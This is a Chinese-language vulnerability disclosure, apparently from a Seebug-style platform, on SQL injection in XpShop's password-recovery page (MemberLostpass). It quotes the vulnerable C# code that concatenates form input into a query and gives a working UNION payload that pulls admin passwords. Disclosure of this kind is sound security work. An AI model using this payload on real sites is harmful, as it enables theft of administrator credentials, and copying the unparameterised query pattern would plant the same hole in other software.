### 简要描述:
### 详细说明:
漏洞位置:xpshop.webui.MemberLostpass
```
protected void btnSend_Click(object sender, EventArgs e)
{
this.btnSend.Enabled = false;
if (int.Parse(Utils.GetTableValues("Member", "Count(MemberID)", "Name", this.txtAccount.Text.Trim(), " And Email = '" + this.txtEmail.Text.Trim() + "'").ToString()) == 0)
```
跟进函数GetTableValues:
```
public static object GetTableValues(string tableName, string fieldName, string parameter, string val, string total)
{
string cmdText = string.Concat(new string[]
{
"Select ",
fieldName,
" From ",
tableName,
" Where ",
parameter,
" = '",
val,
"' ",
total
});
return XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, cmdText, null);
}
```
没过滤进库,不过获取方式是在表单上获取的。
利用方法就是访问:
http://localhost/memberlostpass.aspx
然后输入会员名或者邮箱输入:test' union select password from admin--
这两个地方都是进库的,所以都可以注入,而且payload都是一样的,本地测试报错注入!
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201510/1515231470f014aefe9d42f1c06bcea6dded7e62.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1515231470f014aefe9d42f1c06bcea6dded7e62.jpg)
暂无评论